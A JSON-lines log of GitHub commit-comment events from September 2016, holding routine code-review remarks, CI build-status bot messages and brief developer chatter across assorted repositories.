{"id":"4531677309","type":"CommitCommentEvent","actor":{"login":"evgen66rus"},"repo":{"name":"evgen66rus/test"},"payload":{"comment":{"id":18939319,"position":null,"line":null,"path":null,"commit_id":"45fd5f23823a2727ca725314079008626a9c1c68","created_at":"2016-09-08T03:57:41Z","updated_at":"2016-09-08T03:57:41Z","body":"asdsdfwsdfasdf"}},"created_at":"2016-09-08T03:57:41Z"}
{"id":"4531677545","type":"CommitCommentEvent","actor":{"login":"stv0g"},"repo":{"name":"stv0g/c11-queues"},"payload":{"comment":{"id":18939321,"position":32,"line":32,"path":"bounded_spsc_wip.h","commit_id":"a7daed9e3157641f9ba6553f49037040c3fa5ad6","created_at":"2016-09-08T03:57:45Z","updated_at":"2016-09-08T03:57:45Z","body":"You are using atomic operations on non-atomic types!"}},"created_at":"2016-09-08T03:57:45Z"}
{"id":"4531678854","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18939322,"position":null,"line":null,"path":null,"commit_id":"7f9d76bfe1c8d18a09e9e3001171e08fb08d3dc8","created_at":"2016-09-08T03:58:11Z","updated_at":"2016-09-08T03:58:11Z","body":"os_2_0_develop (kbenne) - x86_64-Linux-Ubuntu-14.04-clang-3.5: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7f9d76bfe1c8d18a09e9e3001171e08fb08d3dc8-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7f9d76bfe1c8d18a09e9e3001171e08fb08d3dc8-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-08T03:58:11Z"}
{"id":"4531679017","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"trevorcai/react-starter"},"payload":{"comment":{"id":18939323,"position":1,"line":1,"path":"ui/reducer.js","commit_id":"df8d3b621cb13f1dac45fb8ef42831f91faf9669","created_at":"2016-09-08T03:58:16Z","updated_at":"2016-09-08T03:58:16Z","body":"There's a library called [keyMirror](https://github.com/STRML/keyMirror) that will help you create an object so you can just do:\r\n\r\n    import types from './types';"}},"created_at":"2016-09-08T03:58:16Z"}
{"id":"4531682663","type":"CommitCommentEvent","actor":{"login":"stv0g"},"repo":{"name":"stv0g/c11-queues"},"payload":{"comment":{"id":18939330,"position":42,"line":42,"path":"bounded_spsc_wip.h","commit_id":"a7daed9e3157641f9ba6553f49037040c3fa5ad6","created_at":"2016-09-08T03:59:50Z","updated_at":"2016-09-08T03:59:50Z","body":"Yes that's right. But putting a fence there makes your code portable to other architectures.\r\n\r\nMaybe `#ifdef` for x86 could be an option"}},"created_at":"2016-09-08T03:59:50Z"}
{"id":"4531687755","type":"CommitCommentEvent","actor":{"login":"stv0g"},"repo":{"name":"stv0g/c11-queues"},"payload":{"comment":{"id":18939338,"position":100,"line":100,"path":"bounded_spsc_wip.h","commit_id":"a7daed9e3157641f9ba6553f49037040c3fa5ad6","created_at":"2016-09-08T04:01:39Z","updated_at":"2016-09-08T04:01:39Z","body":"`mmap()` Allocates with page size granularity (4 kB) and is pain slow in comparison to `malloc()`.\r\nYou are wasting > %99 of the memory here..."}},"created_at":"2016-09-08T04:01:39Z"}
{"id":"4531690032","type":"CommitCommentEvent","actor":{"login":"stv0g"},"repo":{"name":"stv0g/c11-queues"},"payload":{"comment":{"id":18939347,"position":1,"line":1,"path":"c11threads.h","commit_id":"a7daed9e3157641f9ba6553f49037040c3fa5ad6","created_at":"2016-09-08T04:02:34Z","updated_at":"2016-09-08T04:02:34Z","body":"Why do you remove all the other files?\r\nHow can we merge the branch without loosing all the files?"}},"created_at":"2016-09-08T04:02:34Z"}
{"id":"4531690498","type":"CommitCommentEvent","actor":{"login":"ApacheThunder"},"repo":{"name":"DanTheMan827/NTR_Forwarder"},"payload":{"comment":{"id":18939350,"position":null,"line":null,"path":null,"commit_id":"5fa54d988257c5dd927961dbb8ab172204d189fe","created_at":"2016-09-08T04:02:46Z","updated_at":"2016-09-08T04:02:46Z","body":"Ahh I'm starting to see how things are structured. Card Reset occurs right before the main_ui function is called The fifo wait command at the start of main.cpp on arm9 for example as arm9 wait for this to finish so that's the marker for when it happens.\r\n\r\nIf you init DLDI before card reset happens, you were able to access DLDI but the card stopped booting. WHen you had it occur after DLDI didn't work but card still booted.\r\n\r\nThat's my guess. Not able to think away out of this trap though. \r\n\r\nGo to launch_engine_arm7.c and change REG_SCFG_EXT = 0x12A00000; to REG_SCFG_EXT = 0x92A00000;\r\n\r\nAnd go to launch_engine.c over on arm9 and change this line:\r\n\r\nREG_SCFG_EXT = 0x03000000;\r\n\r\nTo:\r\n\r\nREG_SCFG_EXT = 0x83000000;\r\n\r\nThis will set NTR mode SCFG_EXT but not lock it. (it's currently setup to lock SCFG_EXT.\r\n\r\nMaybe SCFG getting locked is breaking it for you for some reason?"}},"created_at":"2016-09-08T04:02:46Z"}
{"id":"4531691473","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":18939352,"position":null,"line":null,"path":null,"commit_id":"c660213b9935079bf9ac89d9705a76527e5770b7","created_at":"2016-09-08T04:03:11Z","updated_at":"2016-09-08T04:03:11Z","body":"> SQLインジェクションとは？\r\n\r\nその② の部分はあっているかと思います！\r\n\r\n他は少し観点が違ってしまっているかなとも思われますので\r\nお手数ですが、もう一度\r\n「PDO SQLインジェクション」\r\nで調べてみましょう。"}},"created_at":"2016-09-08T04:03:11Z"}
{"id":"4531693089","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18939357,"position":null,"line":null,"path":null,"commit_id":"7f9d76bfe1c8d18a09e9e3001171e08fb08d3dc8","created_at":"2016-09-08T04:03:52Z","updated_at":"2016-09-08T04:03:52Z","body":"os_2_0_develop (kbenne) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7f9d76bfe1c8d18a09e9e3001171e08fb08d3dc8-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a>  \n"}},"created_at":"2016-09-08T04:03:52Z"}
{"id":"4531694741","type":"CommitCommentEvent","actor":{"login":"stv0g"},"repo":{"name":"stv0g/c11-queues"},"payload":{"comment":{"id":18939361,"position":9,"line":9,"path":"spsc_port_test.c","commit_id":"84724e86d20aac4d6d1cb1fcde16aae5d3b26935","created_at":"2016-09-08T04:04:34Z","updated_at":"2016-09-08T04:04:34Z","body":"Okay, for an initial test this is fine.\r\n\r\nBut it tells us nothing about thread safety of the data structure. (And thats their purpose).\r\nWe need a producer / consumer pair of threads. Compare with the test for the `mpmc_queue`"}},"created_at":"2016-09-08T04:04:34Z"}
{"id":"4531696616","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18939363,"position":null,"line":null,"path":null,"commit_id":"94f7a1033dc591525ca6e85a2fb02b11d4d12323","created_at":"2016-09-08T04:05:20Z","updated_at":"2016-09-08T04:05:20Z","body":"128792325-Issue5803 (wfbuhl) - Win64-Windows-7-VisualStudio-12: OK (2313 of 2330 tests passed, 555 test warnings)\n\n * 568 tests had: AUD diffs.\n * 164 tests had: EIO diffs.\n * 87 tests had: ERR diffs.\n * 11 tests had: ESO big diffs.\n * 11 tests had: MTR big diffs.\n * 13 tests had: Table big diffs.\n * 24 tests had: RDD diffs.\n * 13 tests had: ESO small diffs.\n * 11 tests had: MTR small diffs.\n * 1 test had: MTD diffs.\n * 2 tests had: Table small diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-94f7a1033dc591525ca6e85a2fb02b11d4d12323-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-94f7a1033dc591525ca6e85a2fb02b11d4d12323-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.27%25-yellow.svg)</a> \n"}},"created_at":"2016-09-08T04:05:20Z"}
{"id":"4531700188","type":"CommitCommentEvent","actor":{"login":"oHarishR"},"repo":{"name":"oSanjeevKumar/IPI-Internship"},"payload":{"comment":{"id":18939379,"position":110,"line":110,"path":"Binding/Binding/Binding.csproj","commit_id":"812c5d57e43a7ec8e558cd6a9ac6922ec049b287","created_at":"2016-09-08T04:06:53Z","updated_at":"2016-09-08T04:06:53Z","body":"This resource file is missing."}},"created_at":"2016-09-08T04:06:53Z"}
{"id":"4531704776","type":"CommitCommentEvent","actor":{"login":"detmersdesign"},"repo":{"name":"detmersdesign/carsetuptracker"},"payload":{"comment":{"id":18939385,"position":3,"line":3,"path":"LICENSE","commit_id":"c7fff5550b06a225eb7503227dac425c226918eb","created_at":"2016-09-08T04:08:53Z","updated_at":"2016-09-08T04:08:53Z","body":"How does this work @smreichling"}},"created_at":"2016-09-08T04:08:53Z"}
{"id":"4531705278","type":"CommitCommentEvent","actor":{"login":"stv0g"},"repo":{"name":"stv0g/c11-queues"},"payload":{"comment":{"id":18939387,"position":6,"line":6,"path":"unbounded_spsc.c","commit_id":"9aedd90a91e309549b4f2be87fa0e2246b8f3d25","created_at":"2016-09-08T04:09:07Z","updated_at":"2016-09-08T04:09:07Z","body":"Okay, same as before. `memory_alloc()` is designed to allocate larger blocks of memory (every allocation will be at least 4 kb).\r\n\r\nYou have to use `malloc()`& `free()` here or use an existing malloc implementation like [ptmalloc](http://www.malloc.de/en/) which is backed by memory areas allocated by `memory_alloc()`."}},"created_at":"2016-09-08T04:09:07Z"}
{"id":"4531705658","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18939388,"position":null,"line":null,"path":null,"commit_id":"7f9d76bfe1c8d18a09e9e3001171e08fb08d3dc8","created_at":"2016-09-08T04:09:15Z","updated_at":"2016-09-08T04:09:15Z","body":"os_2_0_develop (kbenne) - i386-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7f9d76bfe1c8d18a09e9e3001171e08fb08d3dc8-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7f9d76bfe1c8d18a09e9e3001171e08fb08d3dc8-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-08T04:09:15Z"}
{"id":"4531706617","type":"CommitCommentEvent","actor":{"login":"liach"},"repo":{"name":"CovertJaguar/Railcraft"},"payload":{"comment":{"id":18939391,"position":16,"line":45,"path":"src/main/java/mods/railcraft/common/items/ItemTie.java","commit_id":"d4daba9907e218c9d3c4a89564c6466eaf022800","created_at":"2016-09-08T04:09:39Z","updated_at":"2016-09-08T04:09:39Z","body":"Wait what concrete is an item? Then could you add a recipe through forestry machines?"}},"created_at":"2016-09-08T04:09:39Z"}
{"id":"4531706661","type":"CommitCommentEvent","actor":{"login":"smreichling"},"repo":{"name":"detmersdesign/carsetuptracker"},"payload":{"comment":{"id":18939392,"position":3,"line":3,"path":"LICENSE","commit_id":"c7fff5550b06a225eb7503227dac425c226918eb","created_at":"2016-09-08T04:09:39Z","updated_at":"2016-09-08T04:09:39Z","body":"I don't know\n\ndetmersdesign <notifications@github.com> schrieb am Mi., 7. Sep. 2016,\n21:08:\n\n> How does this work @smreichling <https://github.com/smreichling>\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/detmersdesign/carsetuptracker/commit/c7fff5550b06a225eb7503227dac425c226918eb#commitcomment-18939385>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AGBC-kSEpjTpjAUd1Dfk-h8RUqZoXBWjks5qn4pVgaJpZM4J3l5D>\n> .\n>\n"}},"created_at":"2016-09-08T04:09:39Z"}
{"id":"4531706802","type":"CommitCommentEvent","actor":{"login":"prakashn27"},"repo":{"name":"prakashn27/ui-select"},"payload":{"comment":{"id":18939395,"position":null,"line":null,"path":null,"commit_id":"da1cd6c09ad8bf4b8d8ed5aab16db8a2ac5b310c","created_at":"2016-09-08T04:09:44Z","updated_at":"2016-09-08T04:09:44Z","body":"Happy to help :)"}},"created_at":"2016-09-08T04:09:44Z"}
{"id":"4531707334","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":18939401,"position":null,"line":null,"path":null,"commit_id":"c660213b9935079bf9ac89d9705a76527e5770b7","created_at":"2016-09-08T04:09:58Z","updated_at":"2016-09-08T04:09:58Z","body":"### 追記として\r\n一旦try~ catchの部分はSQLインジェクションと切り離して考えましょう。"}},"created_at":"2016-09-08T04:09:58Z"}
{"id":"4531712264","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18939417,"position":null,"line":null,"path":null,"commit_id":"7f9d76bfe1c8d18a09e9e3001171e08fb08d3dc8","created_at":"2016-09-08T04:12:03Z","updated_at":"2016-09-08T04:12:03Z","body":"os_2_0_develop (kbenne) - Win64-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7f9d76bfe1c8d18a09e9e3001171e08fb08d3dc8-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7f9d76bfe1c8d18a09e9e3001171e08fb08d3dc8-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-08T04:12:03Z"}
{"id":"4531713354","type":"CommitCommentEvent","actor":{"login":"stv0g"},"repo":{"name":"stv0g/c11-queues"},"payload":{"comment":{"id":18939419,"position":16,"line":11,"path":"spsc_port_test.c","commit_id":"9aedd90a91e309549b4f2be87fa0e2246b8f3d25","created_at":"2016-09-08T04:12:31Z","updated_at":"2016-09-08T04:12:31Z","body":"Try to benchmark this implementation. The number of enqueue / dequeue operations a thread can perform per second is interesting.\r\n\r\nWe need to know if there is an advantage in using SPSC over my MPMC implementation.\r\n\r\nMain bottleneck is currently the memory allocation. You can profile this with gprof."}},"created_at":"2016-09-08T04:12:31Z"}
{"id":"4531713855","type":"CommitCommentEvent","actor":{"login":"liach"},"repo":{"name":"AlmuraDev/Almura"},"payload":{"comment":{"id":18939420,"position":26,"line":513,"path":"src/main/java/com/almuradev/almura/CommonProxy.java","commit_id":"9a7467c47e1ee50675262127ea3f567024f305cf","created_at":"2016-09-08T04:12:44Z","updated_at":"2016-09-08T04:12:44Z","body":"What a heck"}},"created_at":"2016-09-08T04:12:44Z"}
{"id":"4531715437","type":"CommitCommentEvent","actor":{"login":"Dabug123"},"repo":{"name":"AOSIP/platform_frameworks_base"},"payload":{"comment":{"id":18939423,"position":null,"line":null,"path":null,"commit_id":"062e145157f03009f36d218c255b2e69f605cbdc","created_at":"2016-09-08T04:13:23Z","updated_at":"2016-09-08T04:13:23Z","body":"Lol that's a great commit"}},"created_at":"2016-09-08T04:13:23Z"}
{"id":"4531716479","type":"CommitCommentEvent","actor":{"login":"sindresorhus"},"repo":{"name":"SamVerschueren/alfred-notifier"},"payload":{"comment":{"id":18939424,"position":5,"line":5,"path":"index.js","commit_id":"e4c7abecd27ff686aea4abd9da87abfcfa33b256","created_at":"2016-09-08T04:13:50Z","updated_at":"2016-09-08T04:13:50Z","body":"What I usually do in this situation is to instead just `path.join(__dirname, 'check.js)` and then you don't have to set `cwd` or pass the `process.cwd()`."}},"created_at":"2016-09-08T04:13:50Z"}
{"id":"4531723305","type":"CommitCommentEvent","actor":{"login":"cilantroh20"},"repo":{"name":"cilantroh20/Code_Your_Own_Quiz"},"payload":{"comment":{"id":18939434,"position":null,"line":null,"path":null,"commit_id":"5905fadabaaba22ce0893476614792657b28d2c8","created_at":"2016-09-08T04:16:38Z","updated_at":"2016-09-08T04:16:38Z","body":"commits were made so that a user can choose to restart if they are a winner, and a user can make X amount of mistake through the quiz."}},"created_at":"2016-09-08T04:16:38Z"}
{"id":"4531725580","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"trevorcai/react-starter"},"payload":{"comment":{"id":18939438,"position":21,"line":25,"path":"ui/search.jsx","commit_id":"c01ebd2c4f144878959b3530108e19dfd810365d","created_at":"2016-09-08T04:17:37Z","updated_at":"2016-09-08T04:17:37Z","body":"If you define another function in your Component:\r\n\r\n    renderMovie = (movie, index) => {\r\n      <div key={index} className=\"moviebox\">\r\n        {`${movie.Title} (${movie.Year})`}\r\n      </div>\r\n    }\r\n\r\nThis line can be changed to:\r\n\r\n    <div>{movies.map(this.renderMovie}</div>"}},"created_at":"2016-09-08T04:17:37Z"}
{"id":"4531726875","type":"CommitCommentEvent","actor":{"login":"fabien"},"repo":{"name":"fabien/lb-connector-mandrill"},"payload":{"comment":{"id":18939441,"position":5,"line":140,"path":"lib/mandrill.js","commit_id":"730b88f8a7f6f80bcc88d99e4aaa40321f62d9ce","created_at":"2016-09-08T04:18:09Z","updated_at":"2016-09-08T04:18:09Z","body":"@dancingshell just opened the 'Issues' section. I have to note though, I have stopped using Mandrill after they changed their ToS earlier this year."}},"created_at":"2016-09-08T04:18:09Z"}
{"id":"4531728648","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"trevorcai/react-starter"},"payload":{"comment":{"id":18939448,"position":21,"line":25,"path":"ui/search.jsx","commit_id":"c01ebd2c4f144878959b3530108e19dfd810365d","created_at":"2016-09-08T04:18:57Z","updated_at":"2016-09-08T04:18:57Z","body":"Looks like Emma already gave you this feedback! https://github.com/trevorcai/react-starter/commit/58a24f394b9468add37759fad182b12a3318a804#commitcomment-18931696"}},"created_at":"2016-09-08T04:18:57Z"}
{"id":"4531731269","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"trevorcai/react-starter"},"payload":{"comment":{"id":18939455,"position":null,"line":null,"path":null,"commit_id":"a77b6e241da9a0558a451ebbba88ebdf2b92aeb4","created_at":"2016-09-08T04:20:10Z","updated_at":"2016-09-08T04:20:10Z","body":"👍 "}},"created_at":"2016-09-08T04:20:10Z"}
{"id":"4531734149","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"trevorcai/react-starter"},"payload":{"comment":{"id":18939463,"position":24,"line":24,"path":"ui/search.jsx","commit_id":"4d329ed7f8ef919e88b690e0ed222129717b7308","created_at":"2016-09-08T04:21:21Z","updated_at":"2016-09-08T04:21:21Z","body":"You can also use `bind` here:\r\n\r\n    onClick={performSearch.bind(this, searchText)}"}},"created_at":"2016-09-08T04:21:21Z"}
{"id":"4531736748","type":"CommitCommentEvent","actor":{"login":"CovertJaguar"},"repo":{"name":"CovertJaguar/Railcraft"},"payload":{"comment":{"id":18939466,"position":16,"line":45,"path":"src/main/java/mods/railcraft/common/items/ItemTie.java","commit_id":"d4daba9907e218c9d3c4a89564c6466eaf022800","created_at":"2016-09-08T04:22:27Z","updated_at":"2016-09-08T04:22:27Z","body":"Oh, yeah. I should probably do that."}},"created_at":"2016-09-08T04:22:27Z"}
{"id":"4531737437","type":"CommitCommentEvent","actor":{"login":"CoolCanuck"},"repo":{"name":"PokemonGoMap/PokemonGo-Map"},"payload":{"comment":{"id":18939467,"position":null,"line":null,"path":null,"commit_id":"5101b05682ba5136aabe3764a33f0ae20156abc0","created_at":"2016-09-08T04:22:43Z","updated_at":"2016-09-08T04:22:43Z","body":"Bad. Goes against HTML5. Please use CSS instead. "}},"created_at":"2016-09-08T04:22:43Z"}
{"id":"4531738772","type":"CommitCommentEvent","actor":{"login":"neobuddy89"},"repo":{"name":"Alucard24/Alucard-Kernel-jfltexx"},"payload":{"comment":{"id":18939469,"position":94,"line":126,"path":"arch/arm/mach-msm/alucard_hotplug.c","commit_id":"659c329e28ff02201bd8b357baa045a7e9ac1146","created_at":"2016-09-08T04:23:16Z","updated_at":"2016-09-08T04:23:16Z","body":"Check header files."}},"created_at":"2016-09-08T04:23:16Z"}
{"id":"4531740826","type":"CommitCommentEvent","actor":{"login":"azumi830"},"repo":{"name":"ezilla-cram-school/homework"},"payload":{"comment":{"id":18939471,"position":44,"line":0,"path":"sample-20160908.html","commit_id":"8b2afe2692e87b4316768b7a57b31a7ebbce817b","created_at":"2016-09-08T04:24:11Z","updated_at":"2016-09-08T04:24:11Z","body":"if (hope) { foo; } else { bar; }\n(hope) ? foo : bar;"}},"created_at":"2016-09-08T04:24:11Z"}
{"id":"4531750335","type":"CommitCommentEvent","actor":{"login":"azumi830"},"repo":{"name":"ezilla-cram-school/homework"},"payload":{"comment":{"id":18939485,"position":31,"line":0,"path":"sample-20160908.html","commit_id":"8b2afe2692e87b4316768b7a57b31a7ebbce817b","created_at":"2016-09-08T04:28:06Z","updated_at":"2016-09-08T04:28:06Z","body":"if ( give && hugs)\nand\n\nif (give || hugs)\nor"}},"created_at":"2016-09-08T04:28:06Z"}
{"id":"4531752529","type":"CommitCommentEvent","actor":{"login":"chewett26"},"repo":{"name":"bitpay/opencart-plugin"},"payload":{"comment":{"id":18939488,"position":null,"line":null,"path":null,"commit_id":"203487b99cabd13aa5c0312b8087216b0acfc78f","created_at":"2016-09-08T04:28:58Z","updated_at":"2016-09-08T04:28:58Z","body":"+\t\t$this->load->model('setting/setting');"}},"created_at":"2016-09-08T04:28:58Z"}
{"id":"4531753850","type":"CommitCommentEvent","actor":{"login":"LeonidVeriga"},"repo":{"name":"bridgedotnet/Bridge"},"payload":{"comment":{"id":18939490,"position":null,"line":null,"path":null,"commit_id":"b46b27165efa6254b667a7792e27d33e1a635631","created_at":"2016-09-08T04:29:30Z","updated_at":"2016-09-08T04:29:30Z","body":"#1752"}},"created_at":"2016-09-08T04:29:30Z"}
{"id":"4531755597","type":"CommitCommentEvent","actor":{"login":"kevana"},"repo":{"name":"kevana/ui-for-docker"},"payload":{"comment":{"id":18939495,"position":null,"line":null,"path":null,"commit_id":"db5dd0c356e088322742d9a77c13f1b1061884f3","created_at":"2016-09-08T04:30:15Z","updated_at":"2016-09-08T04:30:15Z","body":"I left latest on v0.10.1 until I had time to put the release notes together. The hub's latest should be pointing at v0.11.0 now"}},"created_at":"2016-09-08T04:30:15Z"}
{"id":"4531756033","type":"CommitCommentEvent","actor":{"login":"agwaddel"},"repo":{"name":"agwaddel/github"},"payload":{"comment":{"id":18939497,"position":1,"line":1,"path":"README.md","commit_id":"00470ed1dfbb55aec6f60b81f146371fe6669a42","created_at":"2016-09-08T04:30:24Z","updated_at":"2016-09-08T04:30:24Z","body":"+#hi"}},"created_at":"2016-09-08T04:30:24Z"}
{"id":"4531757190","type":"CommitCommentEvent","actor":{"login":"ppannuto"},"repo":{"name":"lab11/signpost"},"payload":{"comment":{"id":18939499,"position":null,"line":null,"path":null,"commit_id":"7061a51c84236ff771784b2d31a46867bc1dcefd","created_at":"2016-09-08T04:30:52Z","updated_at":"2016-09-08T04:30:52Z","body":"Done in b403bc1. That was harder than it should been."}},"created_at":"2016-09-08T04:30:52Z"}
{"id":"4531759203","type":"CommitCommentEvent","actor":{"login":"fititnt"},"repo":{"name":"webiwg/historia-web-pt"},"payload":{"comment":{"id":18939506,"position":null,"line":null,"path":null,"commit_id":"58c3458a8430634af12d6e5ba1b3a2e307f3d3aa","created_at":"2016-09-08T04:31:45Z","updated_at":"2016-09-08T04:31:45Z","body":"Errei. Refs #14, nao o 12"}},"created_at":"2016-09-08T04:31:45Z"}
{"id":"4531763898","type":"CommitCommentEvent","actor":{"login":"elifoster"},"repo":{"name":"squeek502/VeganOption"},"payload":{"comment":{"id":18939518,"position":44,"line":202,"path":"java/squeek/veganoption/helpers/FluidHelper.java","commit_id":"2aeb85dde4304e00ae9a1f1af520927749b23406","created_at":"2016-09-08T04:33:49Z","updated_at":"2016-09-08T04:33:49Z","body":"Should `facing` be used here and on 203 instead of `EnumFacing.UP`?"}},"created_at":"2016-09-08T04:33:49Z"}
{"id":"4531766821","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"Chikakos/csaitoprogram"},"payload":{"comment":{"id":18939524,"position":9,"line":9,"path":"issue_06/regist.php","commit_id":"947a5cc369c4f8b5da176afdec2ed7d01311d374","created_at":"2016-09-08T04:35:01Z","updated_at":"2016-09-08T04:35:01Z","body":"一旦「PDO」を調べてみましょう！\r\n\r\n「mysql_connect pdo」でも調べてみると良いかと思います！"}},"created_at":"2016-09-08T04:35:01Z"}
{"id":"4531770948","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"Chikakos/csaitoprogram"},"payload":{"comment":{"id":18939541,"position":2,"line":2,"path":"issue_06/insert_into.php","commit_id":"947a5cc369c4f8b5da176afdec2ed7d01311d374","created_at":"2016-09-08T04:36:53Z","updated_at":"2016-09-08T04:36:53Z","body":"このファイルのコードに関してどこのページを参照されたか教えていだだけますでしょうか！\r\n\r\n"}},"created_at":"2016-09-08T04:36:53Z"}
{"id":"4531776967","type":"CommitCommentEvent","actor":{"login":"ifndefdeadmau5"},"repo":{"name":"sv-bootcamp/yoda"},"payload":{"comment":{"id":18939559,"position":3,"line":2,"path":"src/server/config/json/match.callback.js","commit_id":"f1ebb6d6bbfdd0e5cb3c9955775527d9949618e7","created_at":"2016-09-08T04:39:34Z","updated_at":"2016-09-08T04:39:34Z","body":"'Success to send an email.'\r\n                    ^"}},"created_at":"2016-09-08T04:39:34Z"}
{"id":"4531781046","type":"CommitCommentEvent","actor":{"login":"LeonidVeriga"},"repo":{"name":"bridgedotnet/Bridge"},"payload":{"comment":{"id":18939566,"position":null,"line":null,"path":null,"commit_id":"e64ab1108a1cac81fbeb849692e4fb5868e9a69b","created_at":"2016-09-08T04:41:15Z","updated_at":"2016-09-08T04:41:15Z","body":"#1752"}},"created_at":"2016-09-08T04:41:15Z"}
{"id":"4531783120","type":"CommitCommentEvent","actor":{"login":"mrnguyen0504"},"repo":{"name":"offensive-security/kali-nethunter"},"payload":{"comment":{"id":18939571,"position":null,"line":null,"path":null,"commit_id":"38d91d5275d68bf2bd4fd44fae3ec13c7e29f30a","created_at":"2016-09-08T04:42:09Z","updated_at":"2016-09-08T04:42:09Z","body":"Tested kernel on my mi4 - very lagging (90% lagging) and no internal storage\r\nMaybe you use wrong config file (cancro_user_config)\r\ntrue config file is \"cyanogen_cancro_defconfig\" ;)\r\n[sorry for my bad english :(  ] \r\n"}},"created_at":"2016-09-08T04:42:09Z"}
{"id":"4531784519","type":"CommitCommentEvent","actor":{"login":"dissonanz"},"repo":{"name":"dissonanz/rbs-sandbox"},"payload":{"comment":{"id":18939573,"position":null,"line":null,"path":null,"commit_id":"d4071ad68d295b5cfc9e43614b5829b8005a8cbd","created_at":"2016-09-08T04:42:46Z","updated_at":"2016-09-08T04:42:46Z","body":"@cloudnautique can you please take a look at this change and see if you figure out why I'm getting the following error?\r\n\r\n```\r\nrancher/members.go:57: cannot use members (type []client.ProjectMember) as type []interface {} in field value\r\n```\r\n\r\n"}},"created_at":"2016-09-08T04:42:46Z"}
{"id":"4531786968","type":"CommitCommentEvent","actor":{"login":"Baoyx007"},"repo":{"name":"1exciting/BD_FET"},"payload":{"comment":{"id":18939576,"position":null,"line":null,"path":null,"commit_id":"056f9872acd9e8d47abf542def266834ed07ef9d","created_at":"2016-09-08T04:43:50Z","updated_at":"2016-09-08T04:43:50Z","body":"`<span style=\"background-color:#1cc\">${str}</span>`\r\n可以写成 '<span style=\"background-color:#1cc\">$&</span>"}},"created_at":"2016-09-08T04:43:50Z"}
{"id":"4531789082","type":"CommitCommentEvent","actor":{"login":"AnaCarolina5621"},"repo":{"name":"AnaCarolina5621/Plataforma-de-negociacao"},"payload":{"comment":{"id":18939577,"position":null,"line":null,"path":null,"commit_id":"e7bdcc21e4348619c708845a5156be09bfe24d97","created_at":"2016-09-08T04:44:40Z","updated_at":"2016-09-08T04:44:40Z","body":"\r\n![imgicon](https://cloud.githubusercontent.com/assets/22019306/18337307/b56edf34-7565-11e6-8013-a2cadc633c22.png)\r\n[Plataforma-de-negociacao/Projetos/login.html](url)"}},"created_at":"2016-09-08T04:44:40Z"}
{"id":"4531792809","type":"CommitCommentEvent","actor":{"login":"tommythorn"},"repo":{"name":"ku-fpg/kansas-lava"},"payload":{"comment":{"id":18939583,"position":null,"line":null,"path":null,"commit_id":"ea63395903e933dc7b94ee2219c2f505cf01834d","created_at":"2016-09-08T04:46:19Z","updated_at":"2016-09-08T04:46:19Z","body":"You meant `https://jdebp.eu/FGA/bit-shifts-in-vhdl.html`?\r\n"}},"created_at":"2016-09-08T04:46:19Z"}
